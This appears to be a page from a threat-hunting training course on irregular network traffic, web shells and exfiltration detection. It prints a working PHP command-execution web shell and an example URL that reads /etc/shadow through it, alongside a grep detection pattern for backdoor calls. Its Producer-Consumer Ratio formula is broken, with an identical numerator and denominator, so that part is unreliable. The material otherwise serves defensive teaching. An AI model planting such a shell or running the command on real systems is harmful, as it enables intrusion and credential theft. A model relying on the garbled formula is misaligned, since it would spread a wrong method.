Hunting for irregular traffic

Irregularities in network traffic are useful indicators for threat hunters

Malware authors use a variety of techniques to hide C2 traffic

  • Missused protocols

  • Port-application mismatches

Attackers also scan for and use web shells as an initial infection vector

Misused protocols

Common protocols are often misused for C2 since they are less likely to be detected and blocked

  • Most organizations allow DNS, HTTP, etc across network boundaries

Identification of protocol misuse requires knowledge of where data can be hidden in these protocols

  • DNS domains, HTTP header fields, etc

Detecting this type of C2 requires comparing traffic to the norm and investigating anomalies

  • "Rinse and repeat" works for more than just DNS!

Port-application mismatches

Port numbers are in the range 0-65535

  • 0-1023: System ports

  • 1024-49151: User port or registered ports

  • 49152-65535: Dynamic or private ports

Malware authors may use common (HTTPS, DNS, etc) or custom protocols for C2

Malware may mix and match common/uncommon ports and common/custom protocols

  • Common Protocol + Common Port

  • Common Protocol + Uncommon Port

  • Custom Protocol + Common Port

  • Custom Protocol + Uncommon Port

Look at log data (firewall, proxy, webserver and application) to find anomalies

Web shells

Web shells are an undocumented way to gain console access to a computer through a dynamic server-side webpage

Traditionally, these web shells were simple and easy to detect

Sophisticated web shells include methods to interact with the console, edit file, etc.

  • The C99 shell (almost a decade old) has several features:

    • SQL Manager

    • Visual File Manager (many features)

    • PHP Eval

    • Mail Bomber

    • Get all readable home directories

Example

if(isset($_REQUEST['cmd'])){
echo "

";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "
";
die;
}
?>

This shell is straightforward and allows an attacker to simply enter a URL such as the fabricated example below to execute commands:

  • http://comprimised-system.com/simple-backdoor.php?cmd=cat+/etc/shadow

Detecting unencrypted web shells

Shells such as C99 can be detected by using keyword searches or using a signature-based detection tool

The following statement (adapted from Steven Whitney) can be used to detect a PHP backdoor:

  • grep -RPn

  • "(system|phpinfo|pcntl_exec|python_eval|base64_decode|gzip|mkdir|fopen|fclose|readile|passthru)"/pathto/webdir/

This would generate a huge number of false positives, as many of these calls are used be legitimate web applications

Detecting customized web shells

Some web shells, like the one generated with Weevely, have implemented mechanisms specifically aimed at avoiding signature detection

  • Uses compression and encryption for obfuscation

Finding web shells on enterprise web servers can be difficult due to the sheer volume of data

Tools exist to hekp detecting customized web shells:

  • Part of threat hunting suites or vulnerability scaners (Nessus)

  • Standalone tools (Webshell Scan, Scalp, NeoPI)

Data exfiltration

Data exfiltration events are complex

Most involve transport nodes (not sources)

Overt and covert channels may be involved:

  • IP multicasting

  • Browser-based (e.g., DNS prefetching)

  • Tunneling: DNS, HTTP, XXX

  • Piggyback transporting (NTPv3, ICMP, etc)

Data Loss Protection (DLP) solutions may miss exfiltration events:

  • Exfiltration exploits are often steppingstones and not always affect DLP-protected data

  • Distributed exploitation networks are hard for DLP to detect

Product-Consumer Ratio (PCR)

One way to hunt for exfiltration is by detecting the shift in producer/consumer roles of a network node

Product-Consumer Ratio (PCR)

  • First introduced by Carter Bullard and John Gerth

  • All nodes are producers and consumers of data

  • The ratio of produced versus consumed data (PCR) is consistent

PCR=SrcApplicationBytesDstApplicationBytesSrcApplicationBytesDstApplicationBytesPCR = \frac{SrcApplicationBytes - DstApplicationBytes}{SrcApplicationBytes - DstApplicationBytes}

Where ApplicationBytes = (TotalBytes - Sum(L[2,3,4] Headers)) - RetransBytes

Example: DNS could be an exfiltration channel. An increase in PCR for DNS may be an indicator of exfiltration

Additional resources

The following resources on the Skills portal show some network-based threat hunting tools and analysis methods

Cyber threat hunting

  • Cyber-threat hunting - Hunting network-based threats

  • Cyber-threat hunting - Finding threats in .pcap files

  • Cyber-threat hunting - Detecting a port scan

Network traffic analysis

PreviousHunting for suspicious domainsNextHost-based threats

Last updated